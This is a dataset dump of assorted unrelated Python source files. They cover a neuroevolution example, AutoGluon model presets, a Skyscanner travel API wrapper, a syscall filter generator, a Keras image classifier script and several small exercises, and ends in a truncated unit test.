print(\"Solved.\")\n\n # Save the winners.\n for n, g in enumerate(best_genomes):\n name = 'winner-{0}'.format(n)\n with open(name+'.pickle', 'wb') as f:\n pickle.dump(g, f)\n\n visualize.draw_net(config, g, view=False, filename=name+\"-net.gv\")\n visualize.draw_net(config, g, view=False, filename=name+\"-net-enabled.gv\",\n show_disabled=False)\n visualize.draw_net(config, g, view=False, filename=name+\"-net-enabled-pruned.gv\",\n show_disabled=False, prune_unused=True)\n\n break\n except KeyboardInterrupt:\n print(\"User break.\")\n break\n\n env.close()\n\n\nif __name__ == '__main__':\n run()","sub_path":"python/CodeReclaimers_neat-python/neat-python-master/examples/openai-lander/evolve.py","file_name":"evolve.py","file_ext":"py","file_size_in_byte":8803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"519777902","text":"import copy\nimport inspect\nimport logging\nfrom collections import defaultdict\n\nfrom sklearn.linear_model import LogisticRegression, LinearRegression\n\nfrom ...constants import AG_ARGS, AG_ARGS_FIT, BINARY, MULTICLASS, REGRESSION, SOFTCLASS, PROBLEM_TYPES_CLASSIFICATION\nfrom ...models.abstract.abstract_model import AbstractModel\nfrom ...models.fastainn.tabular_nn_fastai import NNFastAiTabularModel\nfrom ...models.lgb.lgb_model import LGBModel\nfrom ...models.lr.lr_model import LinearModel\nfrom ...models.tabular_nn.tabular_nn_model import TabularNeuralNetModel\nfrom ...models.rf.rf_model import RFModel\nfrom ...models.knn.knn_model import KNNModel\nfrom ...models.catboost.catboost_model import CatboostModel\nfrom ...models.xt.xt_model import 
XTModel\nfrom ...metrics import soft_log_loss, mean_squared_error\n\nlogger = logging.getLogger(__name__)\n\n# Higher values indicate higher priority, priority dictates the order models are trained for a given level.\nDEFAULT_MODEL_PRIORITY = dict(\n RF=100,\n XT=90,\n KNN=80,\n GBM=70,\n CAT=60,\n NN=50,\n FASTAI=45,\n LR=40,\n custom=0,\n)\n\n# Problem type specific model priority overrides (will update default values in DEFAULT_MODEL_PRIORITY)\nPROBLEM_TYPE_MODEL_PRIORITY = {\n MULTICLASS: dict(\n NN=120,\n FASTAI=115,\n KNN=110,\n ),\n}\n\nDEFAULT_SOFTCLASS_PRIORITY = dict(\n GBM=100,\n NN=90,\n RF=80,\n CAT=60,\n custom=0,\n)\n\nDEFAULT_CUSTOM_MODEL_PRIORITY = 0\n\nMODEL_TYPES = dict(\n RF=RFModel,\n XT=XTModel,\n KNN=KNNModel,\n GBM=LGBModel,\n CAT=CatboostModel,\n NN=TabularNeuralNetModel,\n LR=LinearModel,\n FASTAI=NNFastAiTabularModel,\n)\n\nDEFAULT_MODEL_NAMES = {\n RFModel: 'RandomForest',\n XTModel: 'ExtraTrees',\n KNNModel: 'KNeighbors',\n LGBModel: 'LightGBM',\n CatboostModel: 'Catboost',\n TabularNeuralNetModel: 'NeuralNet',\n LinearModel: 'LinearModel',\n NNFastAiTabularModel: 'FastAINeuralNet',\n}\n\n\ndef _dd_classifier():\n return 'Classifier'\n\n\ndef _dd_regressor():\n return 'Regressor'\n\n\nDEFAULT_MODEL_TYPE_SUFFIX = dict(\n classifier=defaultdict(_dd_classifier),\n regressor=defaultdict(_dd_regressor),\n)\nDEFAULT_MODEL_TYPE_SUFFIX['classifier'].update({LinearModel: ''})\nDEFAULT_MODEL_TYPE_SUFFIX['regressor'].update({LinearModel: ''})\n\n\n# DONE: Add levels, including 'default'\n# DONE: Add lists\n# DONE: Add custom which can append to lists\n# DONE: Add special optional AG args for things like name prefix, name suffix, name, etc.\n# TODO: Move creation of stack ensemble internally into this function? Requires passing base models in as well.\n# DONE: Add special optional AG args for training order\n# TODO: Add special optional AG args for base models\n# TODO: Consider making hyperparameters arg in fit() accept lists, concatenate hyperparameter sets together.\n# TODO: Consider adding special optional AG args for #cores,#gpus,num_early_stopping_iterations,etc.\n# DONE: Consider adding special optional AG args for max train time, max memory size, etc.\n# TODO: Consider adding special optional AG args for use_original_features,features_to_use,etc.\n# TODO: Consider adding optional AG args to dynamically disable models such as valid_num_classes_range, valid_row_count_range, valid_feature_count_range, etc.\n# TODO: Args such as max_repeats, num_folds\n# TODO: Add banned_model_types arg\n# TODO: Add option to update hyperparameters with only added keys, so disabling CatBoost would just be {'CAT': []}, which keeps the other models as is.\n# TODO: special optional AG arg for only training model if eval_metric in list / not in list. 
Useful for F1 and 'is_unbalanced' arg in LGBM.\ndef get_preset_models(path, problem_type, eval_metric, hyperparameters, stopping_metric=None, num_classes=None, hyperparameter_tune=False,\n level='default', extra_ag_args_fit=None, name_suffix='', default_priorities=None):\n if problem_type not in [BINARY, MULTICLASS, REGRESSION, SOFTCLASS]:\n raise NotImplementedError\n if default_priorities is None:\n default_priorities = copy.deepcopy(DEFAULT_MODEL_PRIORITY)\n if problem_type in PROBLEM_TYPE_MODEL_PRIORITY:\n default_priorities.update(PROBLEM_TYPE_MODEL_PRIORITY[problem_type])\n\n if level in hyperparameters.keys():\n level_key = level\n else:\n level_key = 'default'\n hp_level = hyperparameters[level_key]\n priority_dict = defaultdict(list)\n for model_type in hp_level:\n for model in hp_level[model_type]:\n model = copy.deepcopy(model)\n if AG_ARGS not in model:\n model[AG_ARGS] = dict()\n if 'model_type' not in model[AG_ARGS]:\n model[AG_ARGS]['model_type'] = model_type\n model_priority = model[AG_ARGS].get('priority', default_priorities.get(model_type, DEFAULT_CUSTOM_MODEL_PRIORITY))\n # Check if model is valid\n if hyperparameter_tune and model[AG_ARGS].get('disable_in_hpo', False):\n continue # Not valid\n priority_dict[model_priority].append(model)\n model_priority_list = [model for priority in sorted(priority_dict.keys(), reverse=True) for model in priority_dict[priority]]\n model_names_set = set()\n models = []\n for model in model_priority_list:\n model_type = model[AG_ARGS]['model_type']\n if not inspect.isclass(model_type):\n model_type = MODEL_TYPES[model_type]\n elif not issubclass(model_type, AbstractModel):\n logger.warning(f'Warning: Custom model type {model_type} does not inherit from {AbstractModel}. This may lead to instability. 
Consider wrapping {model_type} with an implementation of {AbstractModel}!')\n else:\n logger.log(20, f'Custom Model Type Detected: {model_type}')\n name_orig = model[AG_ARGS].get('name', None)\n if name_orig is None:\n name_main = model[AG_ARGS].get('name_main', DEFAULT_MODEL_NAMES.get(model_type, model_type.__name__))\n name_prefix = model[AG_ARGS].get('name_prefix', '')\n name_type_suffix = model[AG_ARGS].get('name_type_suffix', None)\n if name_type_suffix is None:\n suffix_key = 'classifier' if problem_type in (PROBLEM_TYPES_CLASSIFICATION+[SOFTCLASS]) else 'regressor'\n name_type_suffix = DEFAULT_MODEL_TYPE_SUFFIX[suffix_key][model_type]\n name_suff = model[AG_ARGS].get('name_suffix', '')\n name_orig = name_prefix + name_main + name_type_suffix + name_suff\n name = name_orig\n num_increment = 2\n while name in model_names_set: # Ensure name is unique\n name = f'{name_orig}_{num_increment}'\n num_increment += 1\n model_names_set.add(name)\n model_params = copy.deepcopy(model)\n model_params.pop(AG_ARGS)\n if extra_ag_args_fit is not None:\n if AG_ARGS_FIT not in model_params:\n model_params[AG_ARGS_FIT] = {}\n model_params[AG_ARGS_FIT].update(extra_ag_args_fit.copy()) # TODO: Consider case of overwriting user specified extra args.\n model_init = model_type(path=path, name=name, problem_type=problem_type, eval_metric=eval_metric, stopping_metric=stopping_metric, num_classes=num_classes, hyperparameters=model_params)\n models.append(model_init)\n\n for model in models:\n model.rename(model.name + name_suffix)\n\n return models\n\n\ndef get_preset_stacker_model(path, problem_type, eval_metric, num_classes=None,\n hyperparameters={'NN': {}, 'GBM': {}}, hyperparameter_tune=False):\n # TODO: Expand options to RF and NN\n if problem_type == REGRESSION:\n model = RFModel(path=path, name='LinearRegression', model=LinearRegression(),\n problem_type=problem_type, eval_metric=eval_metric)\n else:\n model = RFModel(path=path, name='LogisticRegression', model=LogisticRegression(\n solver='liblinear', multi_class='auto', max_iter=500, # n_jobs=-1 # TODO: HP set to hide warnings, but we should find optimal HP for this\n ), problem_type=problem_type, eval_metric=eval_metric)\n return model\n\n\ndef get_preset_models_softclass(path, hyperparameters, num_classes=None, hyperparameter_tune=False, name_suffix=''):\n model_types_standard = ['GBM','NN','CAT']\n hyperparameters = copy.deepcopy(hyperparameters)\n hyperparameters_standard = copy.deepcopy(hyperparameters)\n hyperparameters_rf = copy.deepcopy(hyperparameters)\n default_level_key = 'default'\n if default_level_key in hyperparameters:\n hyperparameters_standard[default_level_key] = {key: hyperparameters_standard[default_level_key][key] for key in hyperparameters_standard[default_level_key] if key in model_types_standard}\n hyperparameters_rf[default_level_key] = {key: hyperparameters_rf[default_level_key][key] for key in hyperparameters_rf[default_level_key] if key == 'RF'}\n else:\n hyperparameters_standard ={key: hyperparameters_standard[key] for key in hyperparameters_standard if key in model_types_standard}\n hyperparameters_rf ={key: hyperparameters_rf[key] for key in hyperparameters_rf if key == 'RF'}\n # TODO: add support for per-stack level hyperparameters\n models = get_preset_models(path=path, problem_type=SOFTCLASS, eval_metric=soft_log_loss, stopping_metric=soft_log_loss,\n hyperparameters=hyperparameters_standard, num_classes=num_classes, hyperparameter_tune=hyperparameter_tune,\n name_suffix=name_suffix, 
default_priorities=DEFAULT_SOFTCLASS_PRIORITY)\n # Swap RF criterion for MSE:\n rf_models = []\n if len(hyperparameters_rf) > 0:\n rf_newparams = {'criterion': 'mse', 'AG_args': {'name_suffix': 'MSE'}}\n if 'RF' in hyperparameters_rf:\n rf_params = hyperparameters_rf['RF']\n elif 'default' in hyperparameters_rf and 'RF' in hyperparameters_rf['default']:\n rf_params = hyperparameters_rf['default']['RF']\n else:\n rf_params = None\n if isinstance(rf_params, list):\n for i in range(len(rf_params)):\n rf_params[i].update(rf_newparams)\n rf_params = [j for n, j in enumerate(rf_params) if j not in rf_params[(n+1):]] # Remove duplicates which may arise after overwriting criterion\n elif rf_params is not None:\n rf_params.update(rf_newparams)\n if 'RF' in hyperparameters_rf:\n hyperparameters_rf['RF'] = rf_params\n elif 'default' in hyperparameters_rf and 'RF' in hyperparameters_rf['default']:\n hyperparameters_rf['default']['RF'] = rf_params\n rf_models = get_preset_models(path=path, problem_type=REGRESSION, eval_metric=mean_squared_error,\n hyperparameters=hyperparameters_rf, hyperparameter_tune=hyperparameter_tune,\n name_suffix=name_suffix, default_priorities=DEFAULT_SOFTCLASS_PRIORITY)\n models_cat = [model for model in models if 'Catboost' in model.name]\n models_noncat = [model for model in models if 'Catboost' not in model.name]\n models = models_noncat + rf_models + models_cat\n if len(models) == 0:\n raise ValueError(\"At least one of the following model-types must be present in hyperparameters: ['GBM','CAT','NN','RF'], \"\n \"These are the only supported models for softclass prediction problems. \"\n \"Softclass problems are also not yet supported for fit() with per-stack level hyperparameters.\")\n for model in models:\n model.normalize_pred_probas = True\n model.name = model.name.replace('Regressor', 'Classifier') # conceal from user that model may actually be a regressor.\n\n return models\n\n\n\"\"\"\ndef get_preset_models_softclassOLD(path, num_classes=None, hyperparameters={'GBM':{}, 'CAT':{}, 'NN':{}, 'RF':{}},\n hyperparameter_tune=False, name_suffix=''):\n models = []\n extra_models = []\n model_types_standard = ['GBM','NN','CAT']\n for modeltype_name in model_types_standard:\n modeltype_options = None\n if modeltype_name in hyperparameters:\n modeltype_options = hyperparameters[modeltype_name]\n elif 'default' in hyperparameters and modeltype_name in hyperparameters['default']:\n modeltype_options = hyperparameters['default'][modeltype_name]\n if modeltype_options is not None:\n model_class = MODEL_TYPES[modeltype_name]\n display_name = DEFAULT_MODEL_NAMES[model_class] + 'SoftClassifier'\n if not isinstance(modeltype_options, list):\n modeltype_options = [modeltype_options]\n for modeltype_option in modeltype_options:\n model_obj = model_class(path=path, name=display_name, problem_type=SOFTCLASS, num_classes=num_classes,\n eval_metric=soft_log_loss, stopping_metric=soft_log_loss, hyperparameters=modeltype_option.copy())\n if modeltype_name == 'CAT':\n extra_models.append(model_obj) # only train CAT models last\n else:\n models.append(model_obj)\n\n rf_type_name = 'RF'\n rf_options = hyperparameters.get(rf_type_name, None)\n rf_params = {'model_type': 'rf'}\n rf_params.update(hyperparameters.copy())\n rf_params['criterion'] = 'mse'\n if rf_options is not None:\n rf_class = MODEL_TYPES[rf_type_name]\n rf_display_name = DEFAULT_MODEL_NAMES[rf_class] + 'SoftClassifier'\n models.append(rf_class(path=path, name=rf_display_name, problem_type=REGRESSION,\n 
eval_metric=mean_squared_error, hyperparameters=rf_params)\n )\n\n models = models + extra_models\n for model in models:\n model.rename(model.name + name_suffix)\n model.normalize_pred_probas = True\n\n return models\n\"\"\"","sub_path":"tabular/src/autogluon/tabular/trainer/model_presets/presets.py","file_name":"presets.py","file_ext":"py","file_size_in_byte":13909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"517725365","text":"import os\nimport random\nfrom dateutil import parser\n\n__author__ = 'Gokcen'\n\nfrom pprint import pprint as pp\nimport functools\n\nfrom skyscanner.skyscanner import Flights, Transport, FlightsCache, Hotels\n\n\nAPI_KEY = os.environ['SKYSCANNER_KEY']\n\n###\n\n\n@functools.lru_cache(maxsize=1024)\ndef city_string_to_id(city_as_str):\n transport_service = Transport(API_KEY)\n city_suggestion_results = transport_service.location_autosuggest(**{\n 'market': 'ES',\n 'currency': 'EUR',\n 'locale': 'en-GB',\n 'query': city_as_str\n }).json()['Places']\n if not city_suggestion_results:\n return None\n else:\n return city_suggestion_results[0]['PlaceId']\n\n\n@functools.lru_cache(maxsize=1024)\ndef city_string_to_id_for_hotels(city_as_str):\n hotels_service = Hotels(API_KEY)\n city_suggestion_results = hotels_service.location_autosuggest(**{\n 'market': 'TR',\n 'currency': 'EUR',\n 'locale': 'en-GB',\n 'query': city_as_str\n }).json()['results']\n cities = list(filter(lambda x: x['geo_type'] == 'City', city_suggestion_results))\n\n if not cities:\n return None\n else:\n return cities[0]\n\n\ndef get_best_flight(from_city, to_city, go_date):\n flights_service = Flights(API_KEY)\n from_city_id = city_string_to_id(from_city)\n to_city_id = city_string_to_id(to_city)\n if not from_city_id or not to_city_id:\n return None\n\n flight_resp = flights_service.get_result(**{\n 'market': 'ES',\n 'currency': 'EUR',\n 'locale': 'en-GB',\n 'country': 'ES',\n 'originplace': from_city_id,\n 'destinationplace': to_city_id,\n 'outbounddate': go_date,\n 'adults': 1,\n 'stops': 0\n })\n\n def get_only_cheapest(iti):\n iti['Pricing'] = iti['PricingOptions'][0]\n del iti['PricingOptions']\n return iti\n\n resp = flight_resp.json()\n try:\n carriers = dict([(carrier['Id'], carrier) for carrier in resp['Carriers']])\n places = dict([(place['Id'], place) for place in resp['Places']])\n # agents = dict([(agent['Id'], agent) for agent in resp['Agents']])\n itineraries = dict(\n [(itinerary['OutboundLegId'], get_only_cheapest(itinerary)) for itinerary in resp['Itineraries']])\n legs = resp['Legs']\n except:\n return None\n\n for leg in legs:\n leg['Carriers'] = list(map(lambda x: carriers[x], leg['Carriers']))\n leg['Itinerary'] = itineraries[leg['Id']]\n leg['DestinationStation'] = places[leg['DestinationStation']]\n leg['OriginStation'] = places[leg['OriginStation']]\n\n if not legs:\n return None\n\n best_offer = random.choice(sorted(legs, key=lambda x: x['Itinerary']['Pricing']['Price'])[:5])\n print(\"Got:\", best_offer['OriginStation']['Name'], best_offer['DestinationStation']['Name'])\n if best_offer:\n return {\n 'type': 'flight',\n 'date': best_offer['Departure'],\n 'price': str(int(best_offer['Itinerary']['Pricing']['Price'])),\n 'description': \"Flight from %s to %s, with %s on %s at %s\" % (\n best_offer['OriginStation']['Name'], best_offer['DestinationStation']['Name'],\n best_offer['Carriers'][0]['Name'],\n parser.parse(best_offer['Departure']).strftime('%B %d, %A'),\n 
parser.parse(best_offer['Departure']).strftime('%H:%M')),\n 'detailsLink': best_offer['Itinerary']['Pricing']['DeeplinkUrl'],\n 'img': best_offer['Carriers'][0]['ImageUrl']\n # 'details': {\n # 'arrival': best_offer['Arrival'],\n # 'departure': best_offer['Departure'],\n # 'origin': best_offer['OriginStation']['Name'],\n # 'destination': best_offer['DestinationStation']['Name'],\n # 'duration': best_offer['Duration'],\n # 'carrier': best_offer['Carriers'][0]['Name']\n # }\n }\n\n\ndef get_best_hotel(city, date_in, date_out):\n hotels_service = Hotels(API_KEY)\n city = city_string_to_id_for_hotels(city)\n\n resp = hotels_service.get_result(**{\n 'market': 'ES',\n 'currency': 'EUR',\n 'locale': 'en-GB',\n 'country': 'ES',\n 'entityid': city['individual_id'],\n 'checkindate': date_in,\n 'checkoutdate': date_out,\n 'guests': 1,\n 'rooms': 1\n })\n\n hotels_prices = dict([(hotel['id'], hotel) for hotel in resp.json()['hotels_prices']])\n hotels = sorted(resp.json()['hotels'], key=lambda x: x['popularity'])\n for hotel in hotels:\n hotel['price'] = hotels_prices[hotel['hotel_id']]['agent_prices'][0]['price_total']\n\n if not hotels:\n return {}\n\n the_hotel_offer = random.choice(hotels[:5])\n return {\n 'type': 'hotel',\n 'date': date_out,\n 'price': str(int(the_hotel_offer['price'])),\n #'details': {\n # 'latitude': the_hotel_offer['latitude'],\n # 'longitude': the_hotel_offer['longitude'],\n # 'name': the_hotel_offer['name'],\n # 'checkin': date_in,\n # 'checkout': date_out\n #}\n 'description': \"In %s, stay at %s, until %s\" % (city['display_name'], the_hotel_offer['name'], parser.parse(date_out).strftime(\"%B %d, %Y, %A\")),\n 'detailsLink': '#',\n 'img': ''\n }\n\n\nif __name__ == \"__main__\":\n pp(get_best_hotel('Barcelona', '2016-10-19', '2016-10-20'))\n pass","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"476969758","text":"def exclude_filter(item, exclude_filters):\n \"\"\"compares each column,filter pair in exclude_filters\n\n if one of them is true it returns False to exclude that item\n else it returns true\n\n Parameters\n ----------\n item : list\n current systemcall\n exclude_filters: dict\n column, exclude pairs\n\n Raises\n ------\n IndexError\n If index of column,filter pair is out of bounds\n \"\"\"\n try:\n for column, exclude in exclude_filters.items():\n if type(exclude) == list:\n for exclude_item in exclude:\n if item[column] == exclude_item:\n return False\n\n elif item[column] == exclude:\n return False\n return True\n except IndexError:\n raise SystemExit('ERROR: exclude_filter could not find specified index! check your filter_set')\n\n\ndef trim_filter(item, trim_filters):\n \"\"\"removes given indices from item\n\n Parameters\n ----------\n item : list\n current systemcall\n trim_filters: list\n indices to delete\n \"\"\"\n item_length = len(item)\n # sorting and reversing indices to prevent index shifts while deleting\n for index in sorted(trim_filters, reverse=True):\n if index < (item_length - 1):\n del item[index]\n return item\n\n\ndef filter_generator(item_generator, filter_set):\n \"\"\"applies exclusion and trim filter if given\n\n Parameters\n ----------\n item_generator : generator\n yieldable systemcalls\n filter_set: dict\n filter_set with exclusions and/or trims\n\n format of filter_set = {\n 'exclude': {\n column: 'str',\n ...\n },\n 'trim': [ column, ... 
]\n }\n \"\"\"\n for item in item_generator:\n if 'exclude' in filter_set:\n if exclude_filter(item, filter_set['exclude']):\n if 'trim' in filter_set:\n yield trim_filter(item, filter_set['trim'])\n else:\n yield item\n elif 'trim' in filter_set:\n yield trim_filter(item, filter_set['trim'])\n else:\n yield item","sub_path":"ids_lib/generators/filter_stream.py","file_name":"filter_stream.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"459375493","text":"def print_green_bottles_text():\n numbers = ['ten', 'nine', 'eight', 'seven', 'six',\n 'five', 'four', 'three', 'two', 'one', 'no']\n hanging_text = \" green bottle{s} hanging on the wall\"\n i = 0\n for number in numbers[:10]:\n i = i + 1\n print(number.title() + hanging_text.format(s=\"s\" if i != 10 else ''), end=',\\n')\n print(number.title() + hanging_text.format(s=\"s\" if i != 10 else ''), end=',\\n')\n print(\"{text} one green bottle should accidentally fall,\\nThere'll be \"\n .format(text=\"And if\" if i < 10 else \"If that\") + numbers[i] +\n hanging_text.format(s=\"s\" if i != 9 else ''), end='.\\n')\n\n\nprint_green_bottles_text()\n","sub_path":"problems-1/v-leshkevich/problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"341589899","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport json\n\nclass TuicoolMagsPipeline(object):\n def __init__(self):\n self.art_file=open(\"/root/tuicool_mags/articles.json\",\"wb\")\n self.mag_file=open(\"/root/tuicool_mags/mags.json\",\"wb\")\n self.all_file=open(\"/root/tuicool_mags/all.json\",\"wb\")\n\n def process_item(self, item, spider):\n line=json.dumps(dict(item))+\"\\n\"\n # self.file.write(line)\n if item.get(\"tuicool_id\",\"false\")!=\"false\":\n print(\"ok..............................mags\")\n self.art_file.write(line)\n elif item.get(\"href\",\"false\")!=\"false\":\n print(\"ok....................art\")\n self.mag_file.write(line)\n else:\n print(\"ok........................error\")\n self.all_file.write(line)\n return item\n\n def close_spider(self,spider):\n print(\"ok you're closing spider\")\n self.art_file.close()\n self.mag_file.close()\n","sub_path":"tuicool_mags/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"461625340","text":"problem_dir = 'starting_kit/ingestion_program/'\r\nscore_dir = 'starting_kit/scoring_program/'\r\nresults_dir = 'results/'\r\n\r\nimport os\r\nfrom sys import path; path.append(problem_dir); path.append(score_dir);\r\nfrom data_io import read_as_df, write\r\nfrom data_manager import DataManager\r\nfrom sklearn.metrics import roc_auc_score\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.models import load_model\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\r\nfrom keras.preprocessing.image import ImageDataGenerator \r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nimport models\r\n\r\n\r\ndata_dir = 'input_data'\r\ndata_name = 'microscopy'\r\n\r\ndata = read_as_df(data_dir + '/' + data_name)\r\n\r\nD = DataManager(data_name, data_dir, 
replace_missing=True)\r\n# print(D)\r\n\r\ndef reshape(X):\r\n\tnum = X.shape[0]\r\n\tX = X.reshape((num,40,40,3))\r\n\tX = X / 255.0\r\n\treturn X\r\n\r\nX_train = reshape(D.data['X_train'])\r\nX_test = reshape(D.data['X_test'])\r\nX_valid = reshape(D.data['X_valid'])\r\n\r\nY_train = D.data['Y_train']\r\nY_valid = D.data['Y_valid']\r\nY_test = D.data['Y_test']\r\n\r\nif os.path.exists('saved_model/best_model.h5'):\r\n\tmodel = load_model('saved_model/best_model.h5')\r\nelse:\r\n\tmodel = models.so_model()\r\n\r\n\t\t\r\nes = EarlyStopping(monitor='val_acc',mode='max',verbose=1, patience=50)\r\nmc = ModelCheckpoint('saved_model/best_model.h5', monitor=\"val_acc\",mode=\"max\", verbose=1, save_best_only=True)\r\naug = ImageDataGenerator(rescale=1/255.0,width_shift_range=0.1,height_shift_range=0.1 ,horizontal_flip=True,brightness_range=[0.2,1.0], shear_range=0.1, zoom_range=0.1)\r\n\r\nXTrain, XTest, YTrain, YTest = train_test_split(X_train, Y_train, test_size=0.2, random_state=42)\r\n\r\n\r\nmodel.fit_generator(aug.flow(XTrain,YTrain, batch_size=64), shuffle=True, epochs=1000,steps_per_epoch = len(XTrain) // 64, validation_data=(XTest,YTest), callbacks=[es,mc])\r\n\r\nsaved_model = load_model('saved_model/best_model.h5')\r\n\r\nY_hat_train = saved_model.predict(X_train) \r\nY_hat_valid = saved_model.predict(X_valid)\r\nY_hat_test = saved_model.predict(X_test)\r\n\r\nresults_name = results_dir + data_name\r\nwrite(results_name + '_train.predict', Y_hat_train)\r\nwrite(results_name + '_valid.predict', Y_hat_valid)\r\nwrite(results_name + '_test.predict', Y_hat_test)\r\n\r\nmetric_name, scoring_function = 'auc_binary', roc_auc_score\r\n\r\nprint('Training score for the', metric_name, 'metric = %5.4f' % scoring_function(Y_train, Y_hat_train))\r\n# print('Valid score for the', metric_name, 'metric = %5.4f' % scoring_function(Y_valid, Y_hat_valid))\r\n# print('Test score for the', metric_name, 'metric = %5.4f' % scoring_function(Y_test, Y_hat_test))\r\nprint('Ideal score for the', metric_name, 'metric = %5.4f' % scoring_function(Y_train, Y_train))\r\n\r\n","sub_path":"Data Science Africa 2019/Microscope/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"643726984","text":"#!/usr/bin/python\n### Script to parse the jsondata from i3-msg\n\nimport json;\nimport sys;\n\ninputData = \"\";\n\nfor line in sys.stdin:\n inputData = inputData + line\n\n\njsonData = json.loads(inputData)\n\nfor workspace in jsonData:\n newformat = \"|num:\" + str(workspace[\"num\"])\n newformat += \"|name:\" + workspace[\"name\"]\n newformat += \"|focused:\" + str(workspace[\"focused\"])\n newformat += \"|output:\" + workspace[\"output\"]\n newformat += \"\\n\"\n sys.stdout.write(newformat)\n","sub_path":"config/lemonbar/workspaces.py","file_name":"workspaces.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"572919304","text":"from math import atan, sqrt, degrees, sin\nimport serial\n\ndef cartesian_to_polar(*args):\n # Accept both (x, y) as well as x, y\n if len(args) == 1:\n coord = args[0]\n else:\n coord = args\n\n # Calculate the r (distance) and phi (angle) \n distance = sqrt(coord[0] ** 2 + coord[1] ** 2)\n angle = degrees(atan(coord[0] / coord[1]))\n output = distance, angle\n\n # Correct the angle for the four different quadrants\n if coord[1] >= 0:\n if coord[0] < 0:\n return output[0], 
90-output[1]\n else:\n return output[0], 270-output[1]\n return output\n\ndef open_connection(port):\n # /dev/ttyUSB0\n cnc_shield = serial.Serial(port, 115200, timeout=1)\n\ndef main():\n pass\n\n## start_x = 0\n## end_x = 100\n## step_x = 0.1\n## for x in range(int(start_x * (1/step_x)), int(end_x * (1/step_x)), int(step_x * (1/step_x))):\n## x /= 1 / step_x\n## y = sin(x)\n## print(cartesian_to_polar(x, y))\n\nif __name__ == '__main__':\n main()\n","sub_path":"Miscellaneous/cartesian_to_polar.py","file_name":"cartesian_to_polar.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"460036842","text":"class Solution:\n # @param {integer} dividend\n # @param {integer} divisor\n # @return {integer}\n def divide(self, dividend, divisor):\n sign=0\n if (dividend>0 and divisor<0) or (dividend<0 and divisor>0):\n sign=1\n \n divd = abs(dividend)\n divi = abs(divisor)\n \n if divi>divd:\n return 0\n \n ret = 0\n d=[]\n d.append(divi)\n i=0\n \n while (d[i]<<1)<=divd:\n d.append(d[i]<<1)\n i+=1\n \n while i>=0:\n while divd-d[i]>=0:\n divd = divd-d[i]\n ret = ret+(1< 0:\n ret = -2147483648\n else:\n if ret>2147483647:\n ret = 2147483647\n return ret\n","sub_path":"Divide_Two_Integers.py","file_name":"Divide_Two_Integers.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"184883220","text":"from game.point import Point\nfrom game import constants\n\nimport arcade\n\nclass PokeLab(arcade.Sprite):\n def __init__(self):\n super().__init__()\n\n self.scale = constants.BUILDING_SCALING\n self.textures = []\n\n texture = arcade.load_texture(constants.POKEMON_LAB)\n self.textures.append(texture)\n \n self.texture = self.textures[0]\n\n self.center_x = constants.POKELAB_START_X\n self.center_y = constants.POKELAB_START_Y\n\n self._hit_box_algorithm = \"Simple\"\n points = ((-56.0, -35.0), (-55.0, -36.0), (55.0, -36.0), (56.0, -35.0), (56.0, 31.0), (55.0, 31.0), (-55.0, 31.0), (-56.0, 31.0))\n self.set_hit_box(points)\n self.get_adjusted_hit_box()\n\n\n","sub_path":"pokemon/game/pokelab.py","file_name":"pokelab.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"419219514","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Top-level package for {{ cookiecutter.project_slug }}.\"\"\"\n\nfrom pkg_resources import get_distribution, DistributionNotFound\n\ntry:\n __version__ = get_distribution(__name__).version\nexcept DistributionNotFound:\n __version__ = \"0.1.0.dev0+missinggit\"\n","sub_path":"{{cookiecutter.project_dash_slug}}/{{cookiecutter.project_slug}}/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"428049058","text":"#!/usr/bin/python\n\nimport unittest\nimport pscheduler\nimport json\nimport os\n\nclass TestEnumerate(unittest.TestCase):\n \n path = os.path.dirname(os.path.realpath(__file__))\n\n def get_output(self, args, check_success=True):\n\n args.insert(0, \"%s/../enumerate\" % self.path)\n\n # actually run cli-to-spec with the input\n code, stdout, stderr = pscheduler.run_program(args)\n\n if check_success:\n # make sure it succeeded\n self.assertEqual(code, 0)\n\n # get json out\n if code != 0:\n return stderr\n return json.loads(stdout)\n\n\n def test_enumerate(self):\n data = 
